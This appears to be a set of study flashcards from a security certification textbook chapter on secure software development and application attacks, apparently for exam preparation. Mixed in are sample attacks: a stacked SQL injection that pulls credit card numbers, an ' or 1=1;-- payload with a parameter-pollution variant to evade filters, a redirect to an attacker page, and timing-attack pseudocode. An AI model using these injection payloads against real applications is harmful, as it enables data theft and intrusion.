One of the issues that a cybersecurity professional needs to watch for with memory or any other limited resource on a system is?

Resource exhaustion. Whether intentional or accidental, systems may consume all of the memory, storage, processing time, or other resources available to them, rendering the system disabled or crippled for other uses.

By exposing code to all developers in an organization, code repositories promote code?

Reuse. Developers seeking code to perform a particular function can search the repository for existing code and reuse it rather than start from ground zero.

Pass-around reviews may involve more than one?

Reviewer, allowing reviewers with different expertise and experience to contribute. Although pass-around reviews allow more flexibility in when they occur than an over-the-shoulder review, they don't provide the same easy opportunity to learn about the code from the developer who wrote it that over-the-shoulder reviews and pair programming offer, making documentation more important.

Improper error handling may expose applications to unacceptable levels of?

Risk. On the flip side of the error handling coin, overly verbose error handling routines may also present risk. If error handling routines explain too much about the inner workings of code, they may allow an attacker to find a way to exploit the code. For example, consider an error message appearing on a French website that contains details of the SQL query used to create the web page. You don't need to speak French to understand that this could allow an attacker to determine the table structure and attempt a SQL injection attack!

Comments can also provide attackers with a?

Roadmap explaining how code works. In some cases, comments may even include critical security details that should remain secret. Developers should take steps to ensure that commented versions of their code remain secret. In the case of compiled code, this is unnecessary, as the compiler automatically removes comments from executable files. However, web applications that expose their code may allow remote users to view comments, so developers should remove comments from production versions of the code before deployment. It's fine to leave the comments in place for archived source code as a reference for future developers—just don't leave them accessible to unknown individuals on the Internet.

Web developers can protect against cookie theft by marking cookies with the?

SECURE attribute.

If a web server simply passes the above request along to the database server, the resulting query (with a little reformatting for ease of viewing) would look something like this?

SELECT ItemName, ItemDescription, ItemPrice FROM Products WHERE ItemName LIKE '%orange%' AND ItemName LIKE '%tiger%' AND ItemName LIKE '%pillow%' ; SELECT CustomerName, CreditCardNumber FROM Orders; --%'
The command above, if successful, would run two different SQL queries (separated by the semicolon). The first would retrieve the product information and the second would retrieve a listing of customer names and credit card numbers.

When we design applications, we should create them in a manner that makes them resilient in the face of changing demand. We do this through the application of two related principles; what are they?

Scalability says that applications should be designed so that the computing resources they require may be incrementally added to support increasing demand.
Elasticity goes a step further than scalability and says that applications should be able to automatically provision resources to scale when necessary and then automatically deprovision those resources to reduce capacity (and cost) when it is no longer needed.

Secure software development life cycles include incorporating?

Security concerns at every stage of the software development process.

Building, deploying, and maintaining software requires?

Security involvement throughout the software's life cycle.

A broad variety of manual and automatic testing tools and methods are available to?

Security professionals and developers. Fortunately, automated tools have continued to improve, providing an easier way to verify that code is more secure.

Race conditions occur when the security of a code segment depends upon the?

Sequence of events occurring within the system.

The cookie contains an authentication string that ties the cookie to a particular user?

Session. If you inspect the contents of your own browser's cookie cache, you'll likely find hundreds or thousands of cookies maintained by the websites that you've visited. Some cookies may be years old.

Code reuse libraries consist of?

Shared code objects that perform related functions. For example, a software library might contain a series of functions related to biology research, financial analysis, or social media. Instead of having to write the code to perform every detailed function they need, developers can simply locate libraries that contain relevant functions and then call those functions.

Attackers without access to the driver source code can use a technique called?

Shimming. This takes a legitimate driver and wraps a malicious driver around the outside of it. The malicious driver, known as a shim, receives requests from the operating system and simply passes them on to the legitimate driver so that the device functions normally. However, the shim can also carry out its malware payload in the background. Fortunately, modern operating systems all contain protections against malicious drivers. The most important of these protections is code signing. Device manufacturers write drivers and then apply digital signatures to them so that the operating system can verify their authenticity. If the driver is not digitally signed, the operating system may warn the user of the suspicious driver or prevent its installation outright. The privileged nature of drivers gives them deep access to the operating system. Security professionals must ensure that the drivers used in their organization are legitimate and were not modified to carry out malicious activities.

Know how to analyze the indicators associated with application attacks?

Software applications may suffer from a wide range of vulnerabilities that make them susceptible to attack. You should be familiar with these attacks, including privilege escalation, cross-site scripting, injection attacks, request forgery attacks, and many other ways that attackers can exploit application code. Understanding the methods behind these attacks helps security professionals build adequate defenses and identify attacks against their organization.

Organizations trying to make libraries more accessible to developers often publish?

Software development kits (SDKs). SDKs are collections of software libraries combined with documentation, examples, and other resources designed to help programmers get up and running quickly in a development environment. SDKs also often include specialized utilities designed to help developers design and test code.

Summary for Chapter 6.

Software plays an integral role in every organization, performing tasks ranging from financial transactions to the management of sensitive physical infrastructure components. Cybersecurity professionals must ensure that the software used in their environment undergoes rigorous testing to ensure that it meets business requirements and does not expose the organization to serious cybersecurity threats. Achieving this goal requires a strong understanding of the different types of vulnerabilities that may arise in source code and in the deployment of client-server and web applications. In this chapter, you learned about many of these vulnerabilities and the tools used to manage software security risks.

Be able to understand secure software development concepts.

Software should be created using a standardized software development life cycle that moves software through development, test, staging, and production environments. Developers should understand the issues associated with code reuse and software diversity. Web applications should be developed in alignment with industry-standard principles such as those developed by the Open Web Application Security Project (OWASP).

Work is typically broken up into short working sessions, called?

Sprints, that can last days to a few weeks. When developers and customers agree that the task is done or when the time allocated for the sprint is complete, the development effort is completed.

Code repositories are centralized locations for the?

Storage and management of application source code.

The main purpose of a code repository is to?

Store the source files used in software development in a centralized location that allows for secure storage and the coordination of changes among multiple developers.

Fagan inspection is a form of?

Structured, formal code review intended to find a variety of problems during the development process. Fagan inspection specifies entry and exit criteria for processes, ensuring that a process is not started before appropriate diligence has been performed, and also making sure that there are known criteria for moving to the next phase.

APIs are tremendously useful for building interfaces between?

Systems, but they can also be a point of vulnerability if they are not properly secured.

Privilege escalation attacks seek to increase the level of access that an attacker has to a?

Target system. They exploit vulnerabilities that allow the transformation of a normal user account into a more privileged account, such as the root superuser account. In October 2016, security researchers announced the discovery of a Linux kernel vulnerability dubbed Dirty COW. This vulnerability, present in the Linux kernel for nine years, was extremely easy to exploit and provided successful attackers with administrative control of affected systems.

Cookies serve as a key to bypass?

The authentication mechanisms of a website. To draw a parallel, imagine attending a trade conference. When you arrive at the registration booth, you might be asked to provide photo identification and pay a registration fee. In this case, you go through an authentication process. After you register, the booth attendant hands you a badge that you wear around your neck for the remainder of the show. From that point forward, any security staff can simply glance at your badge and know that you've already been authenticated and granted access to the show. If someone steals your badge, they now have the same show access that you enjoyed.

Static code analysis (sometimes called source code analysis) is conducted by reviewing?

The code for an application. Since static analysis uses the source code for an application, it can be seen as a type of white-box testing with full visibility to the testers. This can allow testers to find problems that other tests might miss, either because the logic is not exposed to other testing methods or because of internal business logic problems.

Many organizations use multiple environments for their software and systems development and testing. The names and specific purposes for these systems vary depending on organizational needs, but the most common environments are?

The development environment is typically used for developers or other "builders" to do their work. Some workflows provide each developer with their own development environment; others use a shared development environment.
The test environment is where the software or systems can be tested without impacting the production environment. In some schemes, this is production, whereas in others a separate production staging environment is used. Quality assurance (QA) activities take place in the test environment.
The staging environment is a transition environment for code that has successfully cleared testing and is waiting to be deployed into production.
The production environment is the live system. Software, patches, and other changes that have been tested and approved move to production.
Change management processes are typically followed to move through these environments. This provides accountability and oversight and may be required for audit or compliance purposes as well.

Some web servers suffer from a security misconfiguration that allows users to navigate?

The directory structure and access files that should remain secure.

Regardless of which SDLC or process is chosen by your organization, a few phases appear in most SDLC models. What are they?

The feasibility phase is where initial investigations into whether the effort should occur are conducted. Feasibility also looks at alternative solutions and high-level costs for each solution proposed. It results in a recommendation with a plan to move forward. Once an effort has been deemed feasible, it will typically go through an analysis and requirements definition phase. In this phase customer input is sought to determine what the desired functionality is, what the current system or application currently does and what it does not do, and what improvements are desired. Requirements may be ranked to determine which are most critical to the success of the project. The design phase includes design for functionality, architecture, integration points, and techniques, dataflows, business processes, and any other elements that require design consideration. The actual coding of the application occurs during the development phase. This phase may involve testing of parts of the software, including unit testing, the testing of small components individually to ensure they function properly. Although some testing is likely to occur in the development phase, formal testing with customers or others outside the development team occurs in the testing and integration phase. Individual units or software components are integrated and then tested to ensure proper functionality. In addition, connections to outside services, data sources, and other integration may occur during this phase. During this phase user acceptance training (UAT) occurs to ensure that the users of the software are satisfied with its functionality. The important task of ensuring that the end users are trained on the software and that the software has entered general use occurs in the training and transition phase. This phase is sometimes called the acceptance, installation, and development phase.
Once a project reaches completion, the application or service will enter what is usually the longest phase: ongoing operations and maintenance. This phase includes patching, updating, minor modifications, and other work that goes into daily support. The disposition phase occurs when a product or system reaches the end of its life. Although disposition is often ignored in the excitement of developing new products, it is an important phase for a number of reasons: shutting down old products can produce cost savings, replacing existing tools may require specific knowledge or additional effort, and data and systems may need to be preserved or properly disposed of. The order of the phases may vary, with some progressing in a simple linear fashion and others taking an iterative or parallel approach. You will still see some form of each of these phases in successful software life cycles.

Applications, like servers and networks, rely on authentication mechanisms to confirm?

The identity of users and devices and verify that they are authorized to perform specific actions.

Directory traversal attacks work when web servers allow?

The inclusion of operators that navigate directory paths and filesystem access controls don't properly restrict access to files stored elsewhere on the server. For example, consider an Apache web server that stores content in the directory path /var/www/html. That same server might store the shadow password file, which contains hashed user passwords, in the /etc directory using the filename /etc/shadow. Both of these locations are linked through the same directory structure. If the Apache server uses /var/www/html/ as the root location for the website, this is the assumed path for all the files unless otherwise specified. For example, if the site were www.mycompany.com, the URL www.mycompany.com/account.php would refer to the file /var/www/html/account.php stored on the server.

The spiral model uses?

The linear development concepts from the Waterfall model and adds an iterative process that revisits four phases multiple times during the development life cycle to gather more detailed requirements, design functionality guided by the requirements, and build based on the design. In addition, the Spiral model puts significant emphasis on risk assessment as part of the SDLC, reviewing risks multiple times during the development process.

When performing input validation, developers must be mindful of?

The types of legitimate input that may appear in a field. For example, completely disallowing the use of a single quote may be useful in protecting against SQL injection attacks, but it may also make it difficult to enter last names that include apostrophes such as O'Brien.

Now that you have a good understanding of secure code deployment and testing practices, let's turn our attention to the motivating force behind putting these mechanisms in place, which are?

The vulnerabilities that attackers may exploit to undermine our security.

Many organizations reuse code not only internally but by making use of?

Third-party software libraries and software development kits (SDKs). Third-party software libraries are a common way to share code among developers.

The roles of security practitioners in a DevSecOps model include?

Threat analysis and communications, planning, testing, providing feedback, and of course ongoing improvement and awareness responsibilities. To do this requires a strong understanding of the organization's risk tolerance, as well as awareness of what the others involved in the DevSecOps environment are doing and when they are doing it.

An application that immediately returns the result above is probably not vulnerable to?

Timing-based attacks. However, if the application returns the result after a 15-second delay, it is likely vulnerable. This might seem like a strange attack, but it can actually be used to extract information from the database. For example, imagine that the Accounts database table used in the previous example contains an unencrypted field named Password. An attacker could use a timing-based attack to discover the password by checking it letter by letter. The SQL to perform a timing-based attack is a little complex and you won't need to know it for the exam. Instead, here's some pseudocode that illustrates how the attack works conceptually, which might look something like this:

    For each character in the password
        For each letter in the alphabet
            If the current character is equal to the current letter, wait 15 seconds before returning the results

In this manner, an attacker can cycle through all the possible password combinations to ferret out the password character by character. This may seem tedious, but security tools like sqlmap and Metasploit automate blind timing-based attacks, making them quite straightforward.

Although many vulnerabilities affecting applications are a significant security concern for many cybersecurity professionals, the good news is that there are a number of?

Tools available to assist in the development of a defense-in-depth approach to security. Through a combination of secure coding practices and security infrastructure tools, cybersecurity professionals can build robust defenses against application exploits.

Tool-assisted code reviews rely on formal or informal software-based?

Tools to conduct code reviews. Tools like Atlassian's Crucible collaborative code review tool, Codacy's static code review tool, and Phabricator's Differential code review tool are all designed to improve the code review process. The wide variety of tools used for code review reflects not only the multitude of software development life cycle options but also how organizations set up their design and review processes.

A web application could send a user to a thank you page at the conclusion of a?

Transaction. This type of approach is convenient for web developers because it allows administrators to modify the destination page without altering the application code.

Cross-site request forgery attacks, abbreviated as XSRF or CSRF attacks, are similar to cross-site scripting attacks but exploit a different?

Trust relationship.

Request forgery attacks exploit?

Trust relationships and attempt to have users unwittingly execute commands against a remote server.

XSS attacks exploit the?

Trust that a user has in a website to execute code on the user's computer.

XSRF attacks exploit the?

Trust that remote sites have in a user's system to execute commands on the user's behalf.

If not properly secured, unprotected APIs may lead to the?

Unauthorized use of functions. For example, an API that does not use appropriate authentication may allow anyone with knowledge of the API URLs to modify a service.

Secure cookies are never transmitted over?

Unencrypted HTTP connections. Both servers and web browsers understand that they must only be sent over encrypted channels to protect against session replay attacks.

Developers must also anticipate?

Unexpected situations and write error handling code that steps in and handles these situations in a secure fashion.

However, if the application allows redirection to any URL, this creates a situation known as a?

Unvalidated redirect, which an attacker may use to redirect the user to a malicious site. For example, an attacker might post a link to the page above on a message board but alter the URL to appear as:

    http://www.mycompany.com/orderding.php?redirect=http%3a//www.evilhacker.com/passwordstealer.htm

A user visiting the link above would complete the legitimate transaction on the mycompany website but then be redirected to the attacker's page, where code might send the user straight into a session stealing or credential theft attack.

Buffer overflow attacks occur when an attacker manipulates a program into placing more data into an area of memory than is allocated for that program's?

Use. The goal is to overwrite other information in memory with instructions that may be executed by a different process running on the system.

When code requires more in-depth review than relatively lightweight, Agile processes like pass-around and over-the-shoulder reviews, formal code review processes are sometimes?

Used. As you might imagine from the name, formal code reviews are in-depth, often time-consuming processes intended to fully review code using a team of experts. The primary form of formal code review is Fagan inspection.

A cookie is simply a storage object maintained in the?

User's browser that holds variables that may later be accessed by the website that created them. You can think of a cookie as a small database of information that the website maintains in the user's browser.

Developers seeking to include redirection options in their application should perform?

Validated redirects that check redirection URLs against an approved list. This list might specify the exact URLs authorized for redirection, or more simply, it might just limit redirection to URLs from the same domain.

Parameter Pollution works by sending a web application more than one?

Value for the same input variable. For example, a web application may have a variable named account that is specified in a URL like this:

    http://www.mycompany.com/status.php?account=12345

An attacker might try to exploit this application by injecting SQL code into the application like this:

    http://www.mycompany.com/status.php?account=12345' or 1=1;--

However, the string above looks quite suspicious to a web application firewall and would likely be blocked. An attacker seeking to obscure the attack and bypass content filtering mechanisms might instead send a command with two different values like this:

    http://www.mycompany.com/status.php?account=12345&account=12345' or 1=1;--

This approach relies on the premise that the web platform won't handle this URL properly. It might perform input validation on only the first argument but then execute the second argument, allowing the injection attack to slip through the filtering technology.

Many websites maintain detailed catalogs of default passwords used for a wide?

Variety of applications and devices. Those sites are a great starting point for penetration testers seeking to gain access to a networked device.

The table below compares the four informal code review methods and formal code review. Specific implementations may?

Vary, but these comparisons will generally hold true between each type of code review. In addition, the theory behind each method may not always reflect the reality of how an organization will use it. For example, pair programming is intended to provide the same speed for development as two developers working on their own while increasing the quality of the code. This may be true for experienced programmers who work well together, but lack of training, personality differences, and variation in work styles can make pair programming less effective than expected.

Code repositories also perform?

Version control, allowing the tracking of changes and the rollback of the code to earlier versions when required. Basically, code repositories perform the housekeeping work of software development, making it possible for many people to share work on a large software project in an organized fashion. They also meet the needs of security and auditing professionals who want to ensure that software development includes automated auditing and logging of changes.

In a content based blind SQL injection attack, the perpetrator sends input to the?

Web application that tests whether the application is interpreting injected code before attempting to carry out an attack. For example, consider a web application that asks a user to enter an account number.

Web application firewalls (WAFs) also play an important role in protecting?

Web applications against attacks. Though developers should always rely on input validation as their primary defense against injection attacks, the reality is that applications still sometimes contain injection flaws. This can occur when developer testing is insufficient or when vendors do not promptly supply patches to vulnerable applications.

Developers should protect their web applications against XSRF attacks. One way to do this is to create?

Web applications that use secure tokens that the attacker would not know to embed in links. Another safeguard is for sites to check the referring URL in requests received from end users and only accept requests that originated from their own site.

A malicious individual could create a new?

Web page with a link titled "Check your account at First Bank" and encode form input in the link. When the user visits the link, the web page appears to be an authentic First Bank website (because it is!) with the proper address in the toolbar and a valid digital certificate. However, the website would then execute the script included in the input by the malicious user, which appears to be part of the valid web page.

Parameter Pollution attacks depend on defects in?

Web platforms that don't handle multiple copies of the same parameter properly. These vulnerabilities have been around for a while, and most modern platforms are defended against them, but successful parameter pollution attacks still occur today due to unpatched systems or insecure custom code.

One particular issue that might arise if the pointer is empty is that it contains?

What programmers call a null value.

What is the answer to cross-site scripting?

When creating web applications that allow any type of user input, developers must be sure to perform input validation. At the most basic level, applications should never allow a user to include the SCRIPT tag in a reflected input field. However, this does not solve the problem completely; there are many clever alternatives available to an industrious web application attacker. The best solution is to determine the type of input that the application will allow and then validate the input to ensure that it matches the pattern. For example, if an application has a text box that allows users to enter their age, it should accept only one to three digits as input. The application should reject any other input as invalid.

Comments are an important part of any good developer's?

Workflow. Placed strategically throughout code, they provide documentation of design choices, explain workflows, and offer details crucial to other developers who may later be called on to modify or troubleshoot the code. When placed in the right hands, comments are crucial.

The process of designing, creating, supporting, and maintaining that software is known as?

The software development life cycle (SDLC). As a security practitioner, you need to understand the SDLC and its security implications to ensure that the software that your organization uses is well written and secure throughout its lifespan.
